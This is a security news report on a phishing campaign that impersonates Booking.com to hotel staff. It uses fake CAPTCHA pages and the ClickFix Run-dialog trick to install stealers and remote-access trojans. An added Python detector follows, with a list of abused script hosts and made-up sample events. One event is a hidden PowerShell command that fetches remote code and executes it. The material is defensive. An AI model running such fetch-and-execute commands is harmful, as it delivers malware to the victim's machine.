Fake Booking.com emails used in ClickFix phishing campaign attacking hospitality sector

Researchers have exposed an ongoing phishing campaign targeting the hospitality sector by impersonating Booking.com and using a social engineering technique called ClickFix to deliver credential-stealing malware.

The campaign, tracked as Storm-1865 and active since December 2024, aims to commit financial fraud and theft while targeting hospitality professionals across North America, Oceania, Europe and Asia. Attackers send deceptive emails claiming to be from Booking.com, often mentioning negative guest reviews and including links or PDF attachments that seem to direct recipients to the legitimate booking site. However, these links actually lead to counterfeit CAPTCHA verification pages designed to mimic Booking.com. They trick users into executing a command via a keyboard shortcut that opens a Windows Run window.

This command leverages the legitimate mshta.exe binary to drop a payload comprising various malware families such as XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot and NetSupport RAT. Previous iterations of Storm-1865 have also targeted e-commerce buyers. Security experts note that the rapid adoption of the ClickFix technique marks an evolution in social engineering, as it exploits user trust to bypass automated defenses and is now even being embraced by nation-state groups.
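The execution chain described above leaves a recognisable trace in endpoint telemetry: a script host such as mshta.exe starts under explorer.exe (the process that owns the Windows Run dialog) with a remote URL on its command line. The following detector is an added example written for this page, not code from the article or from the researchers it cites; it runs over a handful of constructed process-creation records in the shape of Sysmon Event ID 1 fields, and every path, URL and process name in those records is made up for the illustration.

```python
import re
from typing import Dict, List

# Added illustration (not from the article): flag process-creation events
# that match the ClickFix execution pattern, i.e. a script host launched
# from the Run dialog with a remote URL as its argument. Field names mirror
# Sysmon Event ID 1 (Image, ParentImage, CommandLine); the records are
# constructed for this example and are not real telemetry.

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Script and command hosts commonly abused to fetch and run remote content.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "cmd.exe", "curl.exe", "certutil.exe"}

# The Win+R Run dialog is hosted by explorer.exe, so explorer.exe as the
# parent of a script host is consistent with a pasted or typed command.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Constructed sample events (hypothetical hosts and paths).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" https://example.invalid/verify/captcha.hta'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Vendor\Installer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"'},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" notes.txt'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -w hidden -c "iwr https://example.invalid/x | iex"'},
]


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like ClickFix-style execution (empty if none)."""
    image = basename(event["image"])
    parent = basename(event["parent"])
    has_url = URL_RE.search(event["cmdline"]) is not None
    reasons: List[str] = []
    # Rule 1: mshta.exe pulling an HTA/script straight from a URL.
    if image == "mshta.exe" and has_url:
        reasons.append("mshta.exe executing remote content from a URL")
    # Rule 2: any script host started from the Run dialog with a URL argument.
    if image in SCRIPT_HOSTS and parent in INTERACTIVE_PARENTS and has_url:
        reasons.append(f"{image} spawned from {parent} with a URL on the command line")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run assess() over a list of events and collect the flagged ones."""
    findings = []
    for idx, ev in enumerate(events):
        reasons = assess(ev)
        if reasons:
            findings.append({"index": idx, "image": basename(ev["image"]), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f['index']}: {f['image']}")
        for r in f["reasons"]:
            print(f"  - {r}")
```

The first sample record trips both rules; the fourth (PowerShell under explorer.exe fetching a URL) trips only the second; the local-HTA installer and the Notepad launch are left alone. Because the user has to type or paste the command into the Run dialog, the same command also lands in the per-user RunMRU history under the Explorer key in HKCU, which is a useful corroborating artifact when triaging a flagged host.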